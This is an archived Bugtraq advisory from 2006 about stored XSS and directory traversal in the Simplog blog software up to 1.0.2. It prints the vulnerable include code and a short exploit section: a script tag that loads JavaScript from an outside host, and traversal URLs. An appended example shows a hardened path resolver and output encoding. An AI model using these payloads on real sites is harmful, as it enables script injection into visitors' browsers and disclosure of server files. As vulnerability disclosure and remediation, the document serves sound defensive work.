Bugtraq mailing list archives

Simplog <= 1.0.2 Vulnerabilities


From: retard () 30gigs com
Date: 4 Mar 2006 17:46:40 -0000

ORIGINAL SOURCE: http://notlegal.ws/simplogsploit.txt

-------- summary
        software: simplog
        vendors website: http://daverave.64digits.com/home.php?page=simplog
        versions: <= 1.0.2
        class: remote
        status: unpatched
        exploit: available
        solution: not available
        discovered by: retard and jim
        risk level: medium

-------- description
        simplog does not sanitise blog posts, allowing users to insert
        html into posts and causing an xss vulnerability. also, the
        application uses request variables directly in include paths,
        allowing users to include .txt files other than the intended
        target

        in index.php:
        $act = $_GET['act'];    // taken from the query string, never validated
        if ($act == '')
        {
            include("blog.txt");
        }
        else
        {
            // $act is interpolated into the path as-is, so "../" is honoured
            include("act/$act.txt");
        }

-------- exploit(s)
        xss:
        make any of your blog posts contain a script like below
        <SCRIPT SRC=http://notlegal.ws/xss.js></SCRIPT>

        directory traversal:
        http://example.com/index.php?act=blog&blogid=../somefile
        http://example.com/index.php?act=../somefile

-------- credit
        author(s): retard and jim
        email: retard () 30gigs com
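
A hardened form of the include logic and of post output, as an added example that is not part of the original advisory or of Simplog. resolve_act() and render_post() are hypothetical helper names, and the example assumes pages live as .txt files under act/ and that post text is meant to be plain text. The demo runs against a constructed temporary directory.

```php
<?php
// Added example, not Simplog code. resolve_act() and render_post() are hypothetical helpers.

/** Map a user-supplied page name to a file inside $baseDir, or null if rejected. */
function resolve_act(string $act, string $baseDir): ?string
{
    // Allow only short names of letters, digits, '_' and '-': no '/', '\', '.' or NUL.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $act)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $act . '.txt');
    if ($base === false || $path === false) {
        return null; // base directory or target file does not exist
    }
    // Defence in depth: after symlink resolution the file must still be under $base.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

/** Encode post text for HTML output so markup in a post is shown as text, not run. */
function render_post(string $text): string
{
    return nl2br(htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'));
}

// Constructed demo: a temporary tree with act/blog.txt and one file outside act/.
$root = sys_get_temp_dir() . '/simplog_demo_' . getmypid();
mkdir($root . '/act', 0700, true);
file_put_contents($root . '/act/blog.txt', "blog page\n");
file_put_contents($root . '/somefile.txt', "outside act/\n");

foreach (['blog', '../somefile', 'blog/../../somefile', 'missing'] as $act) {
    $page = resolve_act($act, $root . '/act');
    printf("act=%-24s => %s\n", var_export($act, true), $page ?? 'rejected');
}
// In index.php: keep the empty-act branch, check is_string($_GET['act']), then
// include the path returned by resolve_act() only when it is not null.

echo render_post('<SCRIPT SRC=http://example.com/x.js></SCRIPT>'), "\n";

// Remove the constructed demo files.
array_map('unlink', [$root . '/act/blog.txt', $root . '/somefile.txt']);
rmdir($root . '/act');
rmdir($root);
```

The same resolver applies to any other request parameter that ends up in an include path.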

